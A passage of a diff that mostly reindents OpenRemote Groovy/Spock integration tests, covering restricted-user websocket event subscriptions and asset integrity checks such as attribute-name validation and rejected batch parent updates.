+    client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
 
-        when: "the websocket client connects and subscribes to predicted datapoint events"
-        client.connect()
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.CONNECTED
-        }
+    when: "the websocket client connects and subscribes to predicted datapoint events"
+    client.connect()
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.CONNECTED
+    }
 
-        client.sendMessage(messageToString(
-            EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-            new EventSubscription(AssetPredictedDatapointEvent.class, null, "predicted-restricted-attr")
-        ))
+    client.sendMessage(messageToString(
+                    EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+                    new EventSubscription(AssetPredictedDatapointEvent.class, null, "predicted-restricted-attr")
+                    ))
 
-        and: "a predicted datapoint update is written on a linked restricted attribute"
-        receivedMessages.clear()
-        predictedDatapointResource.writePredictedDatapoints(
+    and: "a predicted datapoint update is written on a linked restricted attribute"
+    receivedMessages.clear()
+    predictedDatapointResource.writePredictedDatapoints(
             null,
             managerTestSetup.apartment1LivingroomId,
             "targetTemperature",
             [new ValueDatapoint<>(getClockTimeOf(container) + 60000, 19d)] as ValueDatapoint<?>[]
-        )
+            )
 
-        then: "the restricted user should receive the restricted attribute event"
-        conditions.eventually {
-            assert receivedMessages.any {
-                it instanceof TriggeredEventSubscription &&
-                    it.subscriptionId == "predicted-restricted-attr" &&
-                    it.events.any { event ->
-                        event instanceof AssetPredictedDatapointEvent &&
-                            event.ref.id == managerTestSetup.apartment1LivingroomId &&
-                            event.ref.name == "targetTemperature"
-                    }
-            }
+    then: "the restricted user should receive the restricted attribute event"
+    conditions.eventually {
+      assert receivedMessages.any {
+        it instanceof TriggeredEventSubscription &&
+        it.subscriptionId == "predicted-restricted-attr" &&
+        it.events.any { event ->
+          event instanceof AssetPredictedDatapointEvent &&
+          event.ref.id == managerTestSetup.apartment1LivingroomId &&
+          event.ref.name == "targetTemperature"
         }
+      }
+    }
 
-        when: "a predicted datapoint update is written on a non-restricted attribute"
-        receivedMessages.clear()
-        predictedDatapointResource.writePredictedDatapoints(
+    when: "a predicted datapoint update is written on a non-restricted attribute"
+    receivedMessages.clear()
+    predictedDatapointResource.writePredictedDatapoints(
             null,
             managerTestSetup.apartment1Id,
             "predictedNonRestricted",
             [new ValueDatapoint<>(getClockTimeOf(container) + 60000, 10d)] as ValueDatapoint<?>[]
-        )
+            )
 
-        then: "no triggered event should be received by the restricted user"
-        assert receivedMessages.every {
-            !(it instanceof TriggeredEventSubscription) || it.subscriptionId != "predicted-restricted-attr"
-        }
+    then: "no triggered event should be received by the restricted user"
+    assert receivedMessages.every {
+      !(it instanceof TriggeredEventSubscription) || it.subscriptionId != "predicted-restricted-attr"
+    }
 
-        cleanup: "the websocket client is disconnected and original roles are restored"
-        identityService.getIdentityProvider().updateUserClientRoles(
+    cleanup: "the websocket client is disconnected and original roles are restored"
+    identityService.getIdentityProvider().updateUserClientRoles(
             keycloakTestSetup.realmBuilding.name,
             keycloakTestSetup.testuser2Id,
             KEYCLOAK_CLIENT_ID,
             ClientRole.WRITE_USER.value,
             ClientRole.READ_MAP.value,
             ClientRole.READ_ASSETS.value
-        )
-        if (client != null) {
-            client.disconnect()
-        }
+            )
+    if (client != null) {
+      client.disconnect()
     }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetIntegrityTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetIntegrityTest.groovy
@@ -51,642 +51,638 @@ import static org.openremote.model.Constants.*
 
 class AssetIntegrityTest extends Specification implements ManagerContainerTrait {
 
-    def "Test asset changes as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+  def "Test asset changes as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
 
-        and: "the asset resource"
-        def serverUri = serverUri(serverPort)
-        def assetResource = getClientApiTarget(serverUri, MASTER_REALM, accessToken).proxy(AssetResource.class)
+    and: "the asset resource"
+    def serverUri = serverUri(serverPort)
+    def assetResource = getClientApiTarget(serverUri, MASTER_REALM, accessToken).proxy(AssetResource.class)
 
-        when: "an asset is created in the authenticated realm"
-        RoomAsset testAsset = new RoomAsset("Test Room")
+    when: "an asset is created in the authenticated realm"
+    RoomAsset testAsset = new RoomAsset("Test Room")
             .setRealm(keycloakTestSetup.realmMaster.name)
-        testAsset = assetResource.create(null, testAsset)
+    testAsset = assetResource.create(null, testAsset)
 
-        then: "the asset should exist"
-        testAsset.name == "Test Room"
-        testAsset.type == RoomAsset.DESCRIPTOR.getName()
-        testAsset.realm == keycloakTestSetup.realmMaster.name
-        testAsset.parentId == null
+    then: "the asset should exist"
+    testAsset.name == "Test Room"
+    testAsset.type == RoomAsset.DESCRIPTOR.getName()
+    testAsset.realm == keycloakTestSetup.realmMaster.name
+    testAsset.parentId == null
 
-        when: "an asset is stored with an illegal attribute name"
-        testAsset = assetResource.get(null, testAsset.getId())
-        testAsset.addOrReplaceAttributes(
+    when: "an asset is stored with an illegal attribute name"
+    testAsset = assetResource.get(null, testAsset.getId())
+    testAsset.addOrReplaceAttributes(
             new Attribute<>("illegal- Attribute:name&&&", ValueType.TEXT)
-        )
-        assetResource.update(null, testAsset.getId(), testAsset)
+            )
+    assetResource.update(null, testAsset.getId(), testAsset)
 
-        then: "the request should fail validation and return a validation report indicating the failure(s)"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            def report =  r.readEntity(ViolationReport)
-            assert report != null
-            assert report.propertyViolations.size() == 1
-            assert report.propertyViolations.get(0).path == "attributes[illegal- Attribute:name&&&].name"
-            return true
-        }
+    then: "the request should fail validation and return a validation report indicating the failure(s)"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      def report = r.readEntity(ViolationReport)
+      assert report != null
+      assert report.propertyViolations.size() == 1
+      assert report.propertyViolations.get(0).path == "attributes[illegal- Attribute:name&&&].name"
+      return true
+    }
 
-        when: "an asset is stored with a non-empty attribute value"
-        testAsset = assetResource.get(null, testAsset.getId())
-        testAsset.addOrReplaceAttributes(
-                new Attribute<>("foo", ValueType.TEXT, "bar")
-        )
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, testAsset.getId())
+    when: "an asset is stored with a non-empty attribute value"
+    testAsset = assetResource.get(null, testAsset.getId())
+    testAsset.addOrReplaceAttributes(
+            new Attribute<>("foo", ValueType.TEXT, "bar")
+            )
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, testAsset.getId())
 
-        then: "the attribute should exist"
-        testAsset.getAttribute("foo").isPresent()
-        testAsset.getAttribute("foo").get().getValue().get() == "bar"
+    then: "the attribute should exist"
+    testAsset.getAttribute("foo").isPresent()
+    testAsset.getAttribute("foo").get().getValue().get() == "bar"
 
-        when: "an asset attribute value is written directly"
-        assetResource.writeAttributeValue(null, testAsset.getId(), "foo", '"bar2"')
+    when: "an asset attribute value is written directly"
+    assetResource.writeAttributeValue(null, testAsset.getId(), "foo", '"bar2"')
 
-        then: "the attribute value should match"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            def asset = assetResource.get(null, testAsset.getId())
-            assert asset.getAttribute("foo").get().getValue().get() == "bar2"
-        }
+    then: "the attribute value should match"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      def asset = assetResource.get(null, testAsset.getId())
+      assert asset.getAttribute("foo").get().getValue().get() == "bar2"
+    }
 
-        when: "an asset attribute value null is written directly"
-        assetResource.writeAttributeValue(null, testAsset.getId(), "foo", null)
+    when: "an asset attribute value null is written directly"
+    assetResource.writeAttributeValue(null, testAsset.getId(), "foo", null)
 
-        then: "the attribute value should match"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            def asset = assetResource.get(null, testAsset.getId())
-            assert !asset.getAttribute("foo").get().getValue().isPresent()
-        }
+    then: "the attribute value should match"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      def asset = assetResource.get(null, testAsset.getId())
+      assert !asset.getAttribute("foo").get().getValue().isPresent()
+    }
 
-        when: "an asset is updated with a different type"
-        testAsset = assetResource.get(null, testAsset.getId())
-        def newTestAsset = new ThingAsset(testAsset.getName())
+    when: "an asset is updated with a different type"
+    testAsset = assetResource.get(null, testAsset.getId())
+    def newTestAsset = new ThingAsset(testAsset.getName())
             .setId(testAsset.getId())
             .setRealm(testAsset.getRealm())
             .setAttributes(testAsset.getAttributes())
             .setParentId(testAsset.getParentId())
 
-        assetResource.update(null, testAsset.id, newTestAsset)
+    assetResource.update(null, testAsset.id, newTestAsset)
 
-        then: "the request should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is updated with a new realm"
-        testAsset.setRealm(keycloakTestSetup.realmBuilding.name)
-        assetResource.update(null, testAsset.id, testAsset)
-
-        then: "the request should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is created with a non existent realm"
-        newTestAsset.setId(null)
-        newTestAsset.setRealm("nonexistentrealm")
-        assetResource.create(null, newTestAsset)
-
-        then: "the request should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is updated with a non-existent parent"
-        testAsset = assetResource.get(null, testAsset.getId())
-        testAsset.setParentId(UniqueIdentifierGenerator.generateId())
-        assetResource.update(null, testAsset.id, testAsset)
-
-        then: "the request should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is updated with itself as a parent"
-        testAsset = assetResource.get(null, testAsset.getId())
-        testAsset.setParentId(testAsset.getId())
-        assetResource.update(null, testAsset.id, testAsset)
-
-        then: "the request should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is updated with a parent in a different realm"
-        testAsset = assetResource.get(null, testAsset.getId())
-        testAsset.setParentId(managerTestSetup.smartBuildingId)
-        assetResource.update(null, testAsset.id, testAsset)
-
-        then: "the request should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is deleted but has children"
-        assetResource.delete(null, [managerTestSetup.apartment1Id])
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+    then: "the request should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent updates reject unknown child asset ids as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset is updated with a new realm"
+    testAsset.setRealm(keycloakTestSetup.realmBuilding.name)
+    assetResource.update(null, testAsset.id, testAsset)
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-
-        and: "there's an asset in the master realm"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def existingAsset = assetResource.create(null, new RoomAsset("Existing asset").setRealm(keycloakTestSetup.realmMaster.name))
-        def missingChildId = UniqueIdentifierGenerator.generateId()
-
-        when: "an updateParent call is made with child asset list containing an unknown child asset id"
-        assetResource.updateParent(null, managerTestSetup.groundFloorId, [existingAsset.id, missingChildId])
-
-        then: "the request should be bad and no asset should be moved"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
-        (assetResource.get(null, existingAsset.id) as RoomAsset).parentId == null
+    then: "the request should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent updates reject unknown parent asset ids as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset is created with a non existent realm"
+    newTestAsset.setId(null)
+    newTestAsset.setRealm("nonexistentrealm")
+    assetResource.create(null, newTestAsset)
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-
-        and: "there's an asset in the master realm"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def existingAsset = assetResource.create(null, new RoomAsset("Existing asset").setRealm(keycloakTestSetup.realmMaster.name))
-        def missingParentId = UniqueIdentifierGenerator.generateId()
-
-        when: "an updateParent call is made with a non-existent parent asset id"
-        assetResource.updateParent(null, missingParentId, [existingAsset.id])
-
-        then: "the request should be bad and no asset should be moved"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
-        (assetResource.get(null, existingAsset.id) as RoomAsset).parentId == null
+    then: "the request should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent updates reject self-parent requests as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset is updated with a non-existent parent"
+    testAsset = assetResource.get(null, testAsset.getId())
+    testAsset.setParentId(UniqueIdentifierGenerator.generateId())
+    assetResource.update(null, testAsset.id, testAsset)
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-
-        and: "there's an asset in the master realm"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def existingAsset = assetResource.create(null, new RoomAsset("Existing asset").setRealm(keycloakTestSetup.realmMaster.name))
-
-        when: "an updateParent call is made with the asset itself as the parent"
-        assetResource.updateParent(null, existingAsset.id, [existingAsset.id])
-
-        then: "the request should be bad and the asset should remain a root asset"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
-        (assetResource.get(null, existingAsset.id) as RoomAsset).parentId == null
+    then: "the request should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent updates reject mixed child realms as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset is updated with itself as a parent"
+    testAsset = assetResource.get(null, testAsset.getId())
+    testAsset.setParentId(testAsset.getId())
+    assetResource.update(null, testAsset.id, testAsset)
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-
-        and: "there are assets in the master and building realms"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def masterAssetForMixedRealm = assetResource.create(null, new RoomAsset("Master Mixed Realm").setRealm(keycloakTestSetup.realmMaster.name))
-        def buildingAssetForMixedRealm = assetResource.create(null, new RoomAsset("Building Mixed Realm").setRealm(keycloakTestSetup.realmBuilding.name))
-
-        when: "an updateParent call is made with child asset list containing child assets from different realms"
-        assetResource.updateParent(null, managerTestSetup.groundFloorId, [masterAssetForMixedRealm.id, buildingAssetForMixedRealm.id])
-
-        then: "the request should be bad and no asset should be moved"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
-        (assetResource.get(null, masterAssetForMixedRealm.id) as RoomAsset).parentId == null
-        (assetResource.get(null, buildingAssetForMixedRealm.id) as RoomAsset).parentId == null
+    then: "the request should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent update rejects null or empty child lists as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset is updated with a parent in a different realm"
+    testAsset = assetResource.get(null, testAsset.getId())
+    testAsset.setParentId(managerTestSetup.smartBuildingId)
+    assetResource.update(null, testAsset.id, testAsset)
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-
-        and: "there's an asset in the master realm"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def rootAsset = assetResource.create(null, new RoomAsset("Root Asset").setRealm(keycloakTestSetup.realmMaster.name))
-
-        when: "a parent update is requested with an empty child list"
-        assetResource.updateParent(null, managerTestSetup.groundFloorId, [] as List<String>)
-
-        then: "the request should be bad"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
-        (assetResource.get(null, rootAsset.id) as RoomAsset).parentId == null
-
-        when: "a parent clear is requested with a null child list"
-        assetResource.updateNoneParent(null, null)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.status == 400
-        (assetResource.get(null, rootAsset.id) as RoomAsset).parentId == null
+    then: "the request should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent updates reject moving an asset under its own descendant as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset is deleted but has children"
+    assetResource.delete(null, [managerTestSetup.apartment1Id])
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+  }
 
-        and: "there is an asset hierarchy in the master realm"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def rootAsset = assetResource.create(null, new RoomAsset("Root asset").setRealm(keycloakTestSetup.realmMaster.name))
-        def childAsset = assetResource.create(null, new RoomAsset("Child asset").setRealm(keycloakTestSetup.realmMaster.name).setParentId(rootAsset.id))
-        def grandChildAsset = assetResource.create(null, new RoomAsset("Grandchild asset").setRealm(keycloakTestSetup.realmMaster.name).setParentId(childAsset.id))
+  def "Batch parent updates reject unknown child asset ids as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
 
-        when: "an updateParent call tries to move the root asset under its own descendant"
-        assetResource.updateParent(null, grandChildAsset.id, [rootAsset.id])
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
 
-        then: "the request should be bad and the hierarchy should remain unchanged"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
-        (assetResource.get(null, rootAsset.id) as RoomAsset).parentId == null
-        (assetResource.get(null, childAsset.id) as RoomAsset).parentId == rootAsset.id
-        (assetResource.get(null, grandChildAsset.id) as RoomAsset).parentId == childAsset.id
+    and: "there's an asset in the master realm"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def existingAsset = assetResource.create(null, new RoomAsset("Existing asset").setRealm(keycloakTestSetup.realmMaster.name))
+    def missingChildId = UniqueIdentifierGenerator.generateId()
+
+    when: "an updateParent call is made with child asset list containing an unknown child asset id"
+    assetResource.updateParent(null, managerTestSetup.groundFloorId, [existingAsset.id, missingChildId])
+
+    then: "the request should be bad and no asset should be moved"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
+    (assetResource.get(null, existingAsset.id) as RoomAsset).parentId == null
+  }
+
+  def "Batch parent updates reject unknown parent asset ids as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "there's an asset in the master realm"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def existingAsset = assetResource.create(null, new RoomAsset("Existing asset").setRealm(keycloakTestSetup.realmMaster.name))
+    def missingParentId = UniqueIdentifierGenerator.generateId()
+
+    when: "an updateParent call is made with a non-existent parent asset id"
+    assetResource.updateParent(null, missingParentId, [existingAsset.id])
+
+    then: "the request should be bad and no asset should be moved"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
+    (assetResource.get(null, existingAsset.id) as RoomAsset).parentId == null
+  }
+
+  def "Batch parent updates reject self-parent requests as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "there's an asset in the master realm"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def existingAsset = assetResource.create(null, new RoomAsset("Existing asset").setRealm(keycloakTestSetup.realmMaster.name))
+
+    when: "an updateParent call is made with the asset itself as the parent"
+    assetResource.updateParent(null, existingAsset.id, [existingAsset.id])
+
+    then: "the request should be bad and the asset should remain a root asset"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
+    (assetResource.get(null, existingAsset.id) as RoomAsset).parentId == null
+  }
+
+  def "Batch parent updates reject mixed child realms as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "there are assets in the master and building realms"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def masterAssetForMixedRealm = assetResource.create(null, new RoomAsset("Master Mixed Realm").setRealm(keycloakTestSetup.realmMaster.name))
+    def buildingAssetForMixedRealm = assetResource.create(null, new RoomAsset("Building Mixed Realm").setRealm(keycloakTestSetup.realmBuilding.name))
+
+    when: "an updateParent call is made with child asset list containing child assets from different realms"
+    assetResource.updateParent(null, managerTestSetup.groundFloorId, [masterAssetForMixedRealm.id, buildingAssetForMixedRealm.id])
+
+    then: "the request should be bad and no asset should be moved"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
+    (assetResource.get(null, masterAssetForMixedRealm.id) as RoomAsset).parentId == null
+    (assetResource.get(null, buildingAssetForMixedRealm.id) as RoomAsset).parentId == null
+  }
+
+  def "Batch parent update rejects null or empty child lists as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "there's an asset in the master realm"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def rootAsset = assetResource.create(null, new RoomAsset("Root Asset").setRealm(keycloakTestSetup.realmMaster.name))
+
+    when: "a parent update is requested with an empty child list"
+    assetResource.updateParent(null, managerTestSetup.groundFloorId, [] as List<String>)
+
+    then: "the request should be bad"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
+    (assetResource.get(null, rootAsset.id) as RoomAsset).parentId == null
+
+    when: "a parent clear is requested with a null child list"
+    assetResource.updateNoneParent(null, null)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.status == 400
+    (assetResource.get(null, rootAsset.id) as RoomAsset).parentId == null
+  }
+
+  def "Batch parent updates reject moving an asset under its own descendant as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "there is an asset hierarchy in the master realm"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def rootAsset = assetResource.create(null, new RoomAsset("Root asset").setRealm(keycloakTestSetup.realmMaster.name))
+    def childAsset = assetResource.create(null, new RoomAsset("Child asset").setRealm(keycloakTestSetup.realmMaster.name).setParentId(rootAsset.id))
+    def grandChildAsset = assetResource.create(null, new RoomAsset("Grandchild asset").setRealm(keycloakTestSetup.realmMaster.name).setParentId(childAsset.id))
+
+    when: "an updateParent call tries to move the root asset under its own descendant"
+    assetResource.updateParent(null, grandChildAsset.id, [rootAsset.id])
+
+    then: "the request should be bad and the hierarchy should remain unchanged"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
+    (assetResource.get(null, rootAsset.id) as RoomAsset).parentId == null
+    (assetResource.get(null, childAsset.id) as RoomAsset).parentId == rootAsset.id
+    (assetResource.get(null, grandChildAsset.id) as RoomAsset).parentId == childAsset.id
+  }
+
+  def "Batch parent updates reject group child-type mismatches as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "there is a group parent that only accepts room assets"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
